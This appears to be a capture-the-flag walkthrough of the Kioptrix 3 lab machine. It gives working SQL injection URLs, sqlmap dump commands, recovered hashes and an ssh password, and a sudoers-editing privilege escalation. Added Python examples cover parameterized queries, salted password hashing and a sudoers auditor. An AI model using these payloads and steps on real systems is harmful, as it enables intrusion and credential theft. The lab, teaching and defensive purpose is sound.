Environment setup
Target VM download: Baidu Netdisk (enter the extraction code)
Extraction code: hjpd
VM network mode: bridged
Attacker machine: Kali Linux 2021.1
Information gathering
1. Probe the target's open ports and running services
nmap -p- -A -T4 192.168.1.101
2. Directory scan with gobuster
gobuster dir -u http://192.168.1.101 \
  -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50 \
  -x php,txt,html,js,php.bak,txt.bak,html.bak,json,git,git.bak,zip,zip.bak
Exploitation
1. Browsing the site reveals a domain name; add it to /etc/hosts
2. Visit the gallery directory
3. Clicking around, a SQL injection vulnerability turns up
4. Method one: manual injection
http://kioptrix3.com/gallery/gallery.php?id=1'&sort=photoid#photos
http://kioptrix3.com/gallery/gallery.php?id=1 order by 6-- -&sort=photoid#photos
http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,2,3,4,5,6-- -&sort=photoid#photos
http://kioptrix3.com/gallery/gallery.php?id=1 union select 1,2,database(),4,5,6-- -&sort=photoid#photos
union select 1,table_name,3,4,5,6 from information_schema.tables where table_schema = char(103,97,108,108,101,114,121)
union select 1,column_name,3,4,5,6 from information_schema.columns where table_name = char(100,101,118,95,97,99,99,111,117,110,116,115)
union select 1,username,password,4,5,6 from dev_accounts
1> order by shows the query returns 6 columns
kioptrix3.com order by 6-- -&sort=photoid#photos
2> Find which columns are echoed back in the page
kioptrix3.com union select 1,2,3,4,5,6-- -&sort=photoid#photos
3> The database name is gallery
kioptrix3.com union select 1,2,database(),4,5,6-- -&sort=photoid#photos
4> To list the tables, gallery first has to be converted to its decimal ASCII codes so it can be passed through char()
Convert a String to Bytes - Online String Tools
5> The table name is dev_accounts
union select 1,table_name,3,4,5,6 from information_schema.tables where table_schema = char(103,97,108,108,101,114,121)
6> After converting the table name the same way, list the columns
union select 1,column_name,3,4,5,6 from information_schema.columns where table_name = char(100,101,118,95,97,99,99,111,117,110,116,115)
7> Username and password retrieved
union select 1,username,password,4,5,6 from dev_accounts
8> Crack the hashes with john
dreg 0d3eccfb887aabd50f243b3f155c0f85
loneferret 5badcaf789d3d1d09794d8f021f40f0e
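The injection chain above works because gallery.php pastes the id and sort request parameters straight into the SQL text. The following is an added example, not the target application's code: a Python/sqlite3 stand-in with the vulnerable query beside a hardened one (integer coercion plus parameter binding for id, an allowlist for the sort identifier, which cannot be bound). Only the names the walkthrough recovered (gallery, dev_accounts, username, password) come from the page; the schema, the col4..col6 column names and the rows are constructed. sqlite3 stands in for MySQL, so database() and information_schema are not available here, but the page's final union payload behaves the same.

```python
import sqlite3

# Constructed stand-in for the gallery database (added example, not the
# target's code). Table and column names follow what the walkthrough
# recovers; the rows and the col4..col6 names are made up.
SCHEMA = """
CREATE TABLE gallery (photoid INTEGER, title TEXT, filename TEXT,
                      col4 TEXT, col5 TEXT, col6 TEXT);
CREATE TABLE dev_accounts (id INTEGER, username TEXT, password TEXT);
INSERT INTO gallery VALUES (1, 'first photo', '1.jpg', '', '', '');
INSERT INTO gallery VALUES (2, 'second photo', '2.jpg', '', '', '');
INSERT INTO dev_accounts VALUES (1, 'devuser', 'c0nstructedmd5hash');
"""

# Columns a client may sort by. Identifiers cannot be bound as query
# parameters, so they are validated against an allowlist instead.
SORT_ALLOWLIST = {"photoid", "title", "filename"}


def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def get_photos_vulnerable(db, id_param, sort="photoid"):
    """Request parameters are spliced into the SQL text: the defect behind
    the walkthrough's union-based injection."""
    sql = ("SELECT photoid, title, filename, col4, col5, col6 FROM gallery "
           f"WHERE photoid={id_param} ORDER BY {sort}")
    return db.execute(sql).fetchall()


def get_photos_hardened(db, id_param, sort="photoid"):
    """id is coerced to an integer and bound as a parameter; sort is checked
    against the allowlist. Unexpected input is rejected, not interpreted."""
    if sort not in SORT_ALLOWLIST:
        raise ValueError(f"unexpected sort column: {sort!r}")
    try:
        photo_id = int(id_param)
    except (TypeError, ValueError):
        raise ValueError(f"id must be an integer, got {id_param!r}")
    sql = ("SELECT photoid, title, filename, col4, col5, col6 FROM gallery "
           f"WHERE photoid=? ORDER BY {sort}")
    return db.execute(sql, (photo_id,)).fetchall()


# The walkthrough's final payload, replayed against the constructed app.
UNION_PAYLOAD = "1 union select 1,username,password,4,5,6 from dev_accounts-- -"


def compare(payload=UNION_PAYLOAD):
    """Run the same payload through both versions and report the outcome."""
    db = build_db()
    leaked = get_photos_vulnerable(db, payload)
    try:
        get_photos_hardened(db, payload)
        blocked = False
    except ValueError:
        blocked = True
    # Rows that came from dev_accounts carry the literal 4 in column four;
    # genuine gallery rows carry an empty string there.
    creds = sorted((r[1], r[2]) for r in leaked if r[3] == 4)
    return {"leaked_credentials": creds, "hardened_rejected": blocked}


if __name__ == "__main__":
    print(compare())
```

The allowlist matters as much as the binding: the page's own requests carry a sort parameter, and an ORDER BY clause assembled from user input is injectable even when every value is bound.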
5. Method two: sqlmap
1>sqlmap -u kioptrix3.com --dbs
2>sqlmap -u kioptrix3.com -D gallery --tables
3>sqlmap -u kioptrix3.com -D gallery -T dev_accounts --columns
4>sqlmap -u kioptrix3.com -D gallery -T dev_accounts -C password,username --dump
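The dumped password fields are 32 hex characters with no salt and no scheme prefix, which is why john finishes step 8 almost instantly. As an added example that is not part of the walkthrough, the block below shows the check that identifies that storage format, the dictionary lookup reduced to its essentials, and the hardened alternative (per-user random salt plus PBKDF2-HMAC-SHA256 with an assumed 200,000 rounds, compared in constant time). The hashes are the two the page dumps; the wordlist and the "c0nstructed" inputs are made up.

```python
import hashlib
import hmac
import os

# The two hashes the walkthrough dumps from dev_accounts.
DUMPED = {
    "dreg": "0d3eccfb887aabd50f243b3f155c0f85",
    "loneferret": "5badcaf789d3d1d09794d8f021f40f0e",
}


def md5_hex(word):
    return hashlib.md5(word.encode()).hexdigest()


def looks_like_unsalted_md5(digest_hex):
    """A 32-character hex string with no $scheme$ prefix is the tell-tale
    shape of an unsalted MD5 password field."""
    return (len(digest_hex) == 32
            and all(c in "0123456789abcdef" for c in digest_hex.lower()))


def wordlist_check(digest_hex, words):
    """What a dictionary attack boils down to for unsalted MD5: one hash per
    candidate, no salt to fold in, no work factor to slow it down.
    Returns the matching word or None."""
    for w in words:
        if md5_hex(w) == digest_hex:
            return w
    return None


# Hardened storage: per-user random salt plus an iterated KDF.
PBKDF2_ROUNDS = 200_000  # assumed value for this example


def hash_password(password, salt=None):
    """Returns 'salt_hex$digest_hex'; a fresh 16-byte salt unless one is given."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex, digest_hex = stored.split("$", 1)
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), PBKDF2_ROUNDS)
    # Constant-time comparison so the check does not leak how much matched.
    return hmac.compare_digest(candidate.hex(), digest_hex)


if __name__ == "__main__":
    for user, h in DUMPED.items():
        print(user, "unsalted md5:", looks_like_unsalted_md5(h))
    # Constructed wordlist; the walkthrough reports john recovering
    # "starwars" for loneferret.
    print(wordlist_check(DUMPED["loneferret"], ["password", "starwars", "letmein"]))
    stored = hash_password("starwars")
    print(verify_password("starwars", stored), verify_password("starwar", stored))
```

With the salted KDF every candidate has to be recomputed per user at the full cost factor, so a leaked dev_accounts table no longer hands over working ssh credentials in seconds; a memory-hard function such as scrypt or Argon2 is the usual choice for new code.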
Privilege escalation
1. Log in over ssh with the recovered username and password
ssh loneferret@192.168.1.101
starwars
2. Running a sudo command gives an error
3. Googling "Error opening terminal: xterm-256color" gives the answer!
export TERM=xterm
4. After running it, you land in a page that looks like a text editor
alt + f
etc/sudoers
sudo's permission rules live in /etc/sudoers. Normally you view that file with cat /etc/sudoers; here, modify sudoers
alt + f s q
5. Save, and the privilege escalation succeeds!!!
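The escalation works because sudo lets this user run an interactive editor as root, and an editor can open and save /etc/sudoers like any other file. The following is an added example, not something from the walkthrough or the target machine: a small sudoers auditor that parses user-specification lines and flags unrestricted ALL grants, NOPASSWD entries and editor commands. The editor list, the SAMPLE_SUDOERS text and the tag handling are assumptions made for this example; it ignores aliases, Defaults lines and includes, and it is meant to run over a file copied off the host (visudo -c remains the syntax check).

```python
import os
import re

# Interactive editors that can open and write any file when run under sudo.
# Assumed list for this example; extend it for your own environment.
EDITORS = {"vi", "vim", "nano", "emacs", "ht", "pico", "joe"}

TAGS = ("NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
        "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT")
# A tag stays in force for the rest of the command list until its opposite appears.
OPPOSITE = {"NOPASSWD": "PASSWD", "PASSWD": "NOPASSWD",
            "NOEXEC": "EXEC", "EXEC": "NOEXEC",
            "SETENV": "NOSETENV", "NOSETENV": "SETENV"}
SKIP_PREFIXES = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<hosts>\S+?)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<rest>.+)$")
TAG_RE = re.compile(r"^(" + "|".join(TAGS) + r"):\s*")

# Constructed sample, not the target machine's file.
SAMPLE_SUDOERS = """\
# constructed sample sudoers
Defaults        env_reset
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
webdev  ALL=(root) NOPASSWD: /usr/bin/vim
backup  ALL=(root) /usr/bin/rsync, !/usr/bin/su
"""


def parse_sudoers(text):
    """Minimal parser for user-specification lines: one dict per rule with
    the user, host list, run-as spec and (tags, command) pairs."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        commands, tags = [], set()
        for part in m.group("rest").split(","):
            part = part.strip()
            t = TAG_RE.match(part)
            while t:
                tags.discard(OPPOSITE.get(t.group(1), ""))
                tags.add(t.group(1))
                part = part[t.end():]
                t = TAG_RE.match(part)
            if part:
                commands.append((frozenset(tags), part))
        rules.append({"user": m.group("user"), "hosts": m.group("hosts"),
                      "runas": m.group("runas") or "root", "commands": commands})
    return rules


def audit(rules):
    """Return (user, command, reason) tuples a reviewer should look at."""
    findings = []
    for rule in rules:
        for tags, cmd in rule["commands"]:
            if cmd.startswith("!"):  # negated entry, not a grant
                continue
            prog = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                findings.append((rule["user"], cmd, "ALL"))
            elif prog in EDITORS:
                findings.append((rule["user"], cmd, "editor"))
            if "NOPASSWD" in tags:
                findings.append((rule["user"], cmd, "NOPASSWD"))
    return findings


if __name__ == "__main__":
    for user, cmd, reason in audit(parse_sudoers(SAMPLE_SUDOERS)):
        print(f"{reason:9} {user:10} {cmd}")
```

The mitigation the findings point at is the usual one: grant the specific non-interactive command a role needs rather than an editor or ALL, and where a file really must be edited under sudo, use sudoedit so the editor runs as the invoking user on a copy and only the final write happens as root.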